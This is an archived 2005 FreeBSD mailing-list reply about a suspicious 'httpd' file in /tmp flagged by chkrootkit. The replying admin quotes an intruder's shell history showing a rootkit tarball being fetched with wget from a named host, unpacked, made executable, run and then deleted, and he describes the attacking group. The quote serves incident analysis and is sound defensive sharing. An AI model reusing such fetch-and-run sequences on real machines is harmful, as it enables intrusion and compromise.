Date: Wed, 9 Feb 2005 15:48:18 +0100 From: Oliver Leitner <Shadow333@gmx.at> To: "Bret Walker" <bret-walker@northwestern.edu>, <freebsd-questions@freebsd.org> Subject: Re: httpd in /tmp - Sound advice sought Message-ID: <20050209145353.304EC43D49@mx1.FreeBSD.org> In-Reply-To: <014901c50de3$15518b10$17336981@medill.northwestern.edu> References: <014901c50de3$15518b10$17336981@medill.northwestern.edu>
next in thread | previous in thread | raw e-mail | index | archive | help
i know a certain hacking group who is trying to run their trojan as httpd, i discovered that info through some shell account i am running, that has tried to start this rootkit on our machine. heres a short view from the shell's history: --------------------- wget geocities.com/setan_maya/taek.tar.gz cd .. ls cd .. ls cd tmp ls wget geocities.com/setan_maya/taek.tar.gz tar zxvf taek.tar.gz ls cd taek ./httpd chmod 755 httpd ./httpd ls cd .. rm -rf taek rm taek.tar.gz ----------------------- this clearly shows, that we have to do with a very dumb person, hence he 1. didnt cleaned his historyfile 2. left the tar.gz file in his homedir 3. loaded the rootkit from the same server he is running the group's webpage on. 4. has a link to their chan on that page, and in the chan as ive monitored for 48hrs, ive found them posting their "successes" directly and unencrypted. I have informed a number of providers and hosters, that had their webpage posted into that chan, and informed them about the breakins, so far i got no message back from them. of course, its a longshot, but they didnt seem to check first if the folder tmp has the executable bit set at all, and they named their client like the file youve found. i hope this helps you further. Greetings Oliver Leitner Technical Staff http://www.shells.at On Tuesday 08 February 2005 14:35, Bret Walker wrote: > Last night, I ran chkrootkit and it gave me a warning about being infected > with Slapper. Slapper exploits vulnerabilities in OpenSSL up to version > 0.96d or older on Linux systems. I have only run 0.97d. The file that > set chkrootkit off > was httpd which was located in /tmp. /tmp is always mounted rw, noexec. > > I update my packages (which are installed via ports) any time there is a > security update. I'm running Apache 1.3.33/PHP 4.3.10/mod_ssl > 2.8.22/OpenSSL 0.97d on 4.10. Register_globals was on in PHP for a couple > of > weeks, but the only code that required it to be on was in a .htaccess/SSL > password protected directory. > > Tripwire didn't show anything that I noted as odd. I reexamined the > tripwire logs, > which are e-mailed to an account off of the machine immediately after > completion, and I don't > see anything odd for the 3/4 days before or after the date on the file. > (I don't scan /tmp) > > I stupidly deleted the httpd file from /tmp, which was smaller than the > actual apache httpd. And I don't back up /tmp. > > The only info I can find regarding this file being in /tmp pertains to > Slapper. Could something have copied a file there? Could I have done it > by mistake at some point - the server's been up ~60 days, plenty of time > for me to forget something? > > This is production box that I very much want to keep up, so I'm seeking > some sound advice. > > Does this box need to be rebuilt? How could a file get written to /tmp, > and is it an issue since it couldn't be executed? I run tripwire nightly, > and haven't seen anything odd to the best of my recollection. I also > check ipfstat -t frequently to see if any odd connections are happening. > > I appreciate any sound advice on this matter. > > Thanks, > Bret -- By reading this mail you agree to the following: using or giving out the email address and any other info of the author of this email is strictly forbidden. By acting against this agreement the author of this mail will take possible legal actions against the abuse.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20050209145353.304EC43D49>